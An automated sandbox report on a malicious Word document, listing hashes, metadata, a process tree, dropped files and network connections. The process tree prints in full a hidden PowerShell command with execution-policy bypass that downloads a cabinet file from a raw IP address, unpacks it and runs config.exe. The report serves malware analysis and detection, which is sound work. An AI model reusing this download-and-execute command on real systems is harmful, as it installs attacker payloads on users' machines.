File name: | 0351c808c016cd5190ea45d5243c6a2c6cd3b5fc4e22571e06b948910e5535f9.doc |
Full analysis: | https://app.any.run/tasks/2496fe31-5977-4550-b55c-f826fcfd5189 |
Verdict: | Malicious activity |
Analysis date: | May 20, 2019, 05:30:53 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 25CCAFF20702C318062741E3AFC00526 |
SHA1: | EB66C76C1373089A1B2442F50FF3164304FA57F9 |
SHA256: | 0351C808C016CD5190EA45D5243C6A2C6CD3B5FC4E22571E06B948910E5535F9 |
SSDEEP: | 384:aWUBwlVKqj4zorih1j8v55ng/IuveW83CrIQXlzmLp:aQkqjCorih1jingwuL83Crx1zyp |
.docx | | | Word Microsoft Office Open XML Format document (52.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (38.8) |
.zip | | | ZIP compressed archive (8.8) |
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0006 |
ZipCompression: | Deflated |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCRC: | 0x24886c04 |
ZipCompressedSize: | 373 |
ZipUncompressedSize: | 1460 |
ZipFileName: | [Content_Types].xml |
Title: | - |
---|---|
Subject: | - |
Creator: | Dell_20170514745 |
Description: | - |
Keywords: | - |
---|---|
LastModifiedBy: | Dell_20170514745 |
RevisionNumber: | 2 |
CreateDate: | 2019:05:17 12:21:00Z |
ModifyDate: | 2019:05:17 12:22:00Z |
Template: | Normal.dotm |
TotalEditTime: | 1 minute |
Pages: | 1 |
Words: | 14 |
Characters: | 81 |
Application: | Microsoft Office Word |
DocSecurity: | None |
Lines: | 1 |
Paragraphs: | 1 |
ScaleCrop: | No |
Company: | - |
LinksUpToDate: | No |
CharactersWithSpaces: | 94 |
SharedDoc: | No |
HyperlinksChanged: | No |
AppVersion: | 16 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3288 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0351c808c016cd5190ea45d5243c6a2c6cd3b5fc4e22571e06b948910e5535f9.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2384 | cmd /c ""C:\Users\admin\AppData\Local\Temp\info.bat" " | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
272 | cmd /c start powershell.exe -ep Bypass -NoP -NonI -W Hidden (new-object System.Net.WebClient).DownloadFile('http://137.59.18.154/test.cab','C:\Users\admin\AppData\Local\Temp\\test.cab'); expand 'C:\Users\admin\AppData\Local\Temp\\test.cab' C:\Users\admin\AppData\Local\Temp -f:* ;Start-Process 'C:\Users\admin\AppData\Local\Temp\\config.exe' | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3452 | powershell.exe -ep Bypass -NoP -NonI -W Hidden (new-object System.Net.WebClient).DownloadFile('http://137.59.18.154/test.cab','C:\Users\admin\AppData\Local\Temp\\test.cab'); expand 'C:\Users\admin\AppData\Local\Temp\\test.cab' C:\Users\admin\AppData\Local\Temp -f:* ;Start-Process 'C:\Users\admin\AppData\Local\Temp\\config.exe' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2532 | "C:\Windows\system32\expand.exe" C:\Users\admin\AppData\Local\Temp\\test.cab C:\Users\admin\AppData\Local\Temp -f:* | C:\Windows\system32\expand.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: LZ Expansion Utility Exit code: 4294967295 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3288 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREE93.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3452 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MVL5CB038IP9L9WBNMSH.temp | — | |
MD5:— | SHA256:— | |||
3288 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$51c808c016cd5190ea45d5243c6a2c6cd3b5fc4e22571e06b948910e5535f9.doc | pgc | |
MD5:4A8806E8656FD16703FF5F7C613578E1 | SHA256:33E685BE90EBEAE820BE51089FF4B9F7C43526F6701AC552DA18A046E650B7CD | |||
3288 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:17222E7BED955763CB75EBDA153E0074 | SHA256:EAEB163582F92B56C14963150DA7DBEA34565552F3D187A793BE19BEB0978882 | |||
3452 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1216dc.TMP | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
3452 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
3288 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\841A6DF.emf | emf | |
MD5:64D6A44B556634933D5E1B69B9322B56 | SHA256:B43651184A6470B1D95E0B27FB50968CB2E6ECDE667D7F782DE0D89B1D66E061 | |||
3288 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\info.bat | text | |
MD5:8919BE6828E014EEC87C10A3FC6C5009 | SHA256:879CE5D45487536B62FC523074934EDA2DA1707C696387A91CDBA4828EF7539B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3452 | powershell.exe | GET | 404 | 137.59.18.154:80 | http://137.59.18.154/test.cab | HK | html | 285 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3452 | powershell.exe | 137.59.18.154:80 | — | Xima Network | HK | suspicious |